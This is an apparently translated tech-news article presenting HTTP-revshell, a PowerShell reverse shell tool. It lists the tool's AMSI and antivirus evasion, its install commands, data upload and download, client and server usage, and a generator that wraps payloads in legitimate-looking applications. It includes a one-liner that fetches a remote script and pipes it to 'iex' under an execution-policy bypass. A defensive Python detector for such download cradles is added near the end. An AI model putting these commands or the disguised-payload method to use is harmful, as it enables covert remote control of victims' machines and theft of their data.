2025-01-19 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article explains in detail what HTTP-revshell is. The editor thinks it is quite practical and shares it here for reference; I hope you gain something from reading it.
HTTP-revshell
HTTP-revshell is a proxy-aware PowerShell reverse shell that bypasses AMSI. The tool is designed for red team researchers and penetration testers and provides a reverse shell connection over HTTP/S. HTTP-revshell uses a covert data channel to gain control of the target device via web requests, bypassing security solutions such as IDS, IPS, and AV.
Features
SSL
proxy-aware
upload function
download function
error control
AMSI bypass
Server-side multi-session support
PowerShell function autocomplete
Installation
Researchers can clone the project source code locally and install the dependencies with the following commands:
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt

Data extraction using upload:
upload /src/path/file C:\dest\path\file

Download:
download C:\src\path\file /dst/path/file

server.py help (server-side usage):
usage: server.py [-h] [--ssl] [--autocomplete] host port

Process some integers.

positional arguments:
  host            Listen Host
  port            Listen Port

optional arguments:
  -h, --help      show this help message and exit
  --ssl           Send traffic over ssl
  --autocomplete  Autocomplete powershell functions

Invoke-WebRev.ps1 help (client-side usage):
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip <IP> -port <PORT> [-ssl]

Tool usage - server-multisession.py (server-side multi-session support)
The server can hold connections with multiple clients at the same time. The menu below has three basic commands: sessions, interact and exit:
- sessions --> Show current active sessions
- interact --> Interact with a session, for example: interact
- exit --> Close application
To change sessions, press CTRL+D to exit the current session without closing it.
Revshell-Generator.ps1 - Automatic payload generator
This script creates an executable file containing the payload needed to use HTTP-revshell. The tool provides six predefined templates and one template that supports customization. The generated payloads carry the icon, product information, copyright information, and other details of a legitimate application. In addition, each one opens the original application before establishing a connection with the server, so that it runs while masquerading as the legitimate application.
Payload generator usage:
powershell -ep bypass "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1|iex"
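From the defender's side, the generator one-liner above is an in-memory download cradle: a web fetch piped into iex under an execution-policy bypass. The following detector is an added example, not code from the original article or the HTTP-revshell project; the event tuples, host names and severity labels are constructed assumptions, and the input is assumed to be process-creation command lines from endpoint logging.

```python
import re
from urllib.parse import urlparse

# Command-line traits of an in-memory PowerShell download cradle, the pattern
# used by the generator one-liner above (fetch a script, pipe it to iex).
BYPASS = re.compile(r"(?i)(?:^|\s)-(?:ep|ex[a-z]*)\s+bypass\b")
FETCH = re.compile(r"(?i)\b(?:iwr|irm|curl|wget|invoke-webrequest|"
                   r"invoke-restmethod)\b|downloadstring\s*\(")
EXEC = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")
URL = re.compile(r"(?i)https?://[^\s\"'|)]+")


def analyze(command_line):
    """Return a finding for one process command line, or None if not a cradle."""
    lowered = command_line.lower()
    if "powershell" not in lowered and "pwsh" not in lowered:
        return None
    # Require both halves: a fetch alone is a download, iex alone is local code.
    if not (FETCH.search(command_line) and EXEC.search(command_line)):
        return None
    bypass = bool(BYPASS.search(command_line))
    hosts = sorted({name for url in URL.findall(command_line)
                    if (name := urlparse(url).hostname)})
    return {"severity": "high" if bypass else "medium",
            "policy_bypass": bypass, "hosts": hosts}


def scan(events):
    """Return (host, finding) pairs for every flagged (host, command_line)."""
    return [(host, f) for host, cmd in events if (f := analyze(cmd)) is not None]


# Constructed process-creation records (hostname, command line) for the demo.
SAMPLE_EVENTS = [
    ("WS-014", 'powershell -ep bypass "iwr -useb https://raw.githubusercontent.com'
               '/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1|iex"'),
    ("WS-022", "powershell.exe -NoProfile -Command \"IEX (New-Object "
               "Net.WebClient).DownloadString('http://example.test/a.ps1')\""),
    ("WS-031", "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"),
    ("WS-040", 'powershell -Command "Invoke-WebRequest '
               'https://example.test/report.csv -OutFile r.csv"'),
]

if __name__ == "__main__":
    for host, finding in scan(SAMPLE_EVENTS):
        print(host, finding)
```

Command-line matching misses encoded or obfuscated invocations, so it is best paired with PowerShell script block logging (event ID 4104), which records the script text after it has been decoded.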
That is all for this article on "what does HTTP-revshell mean". I hope the above content is of some help and lets you learn more. If you think the article is good, please share it so more people can see it.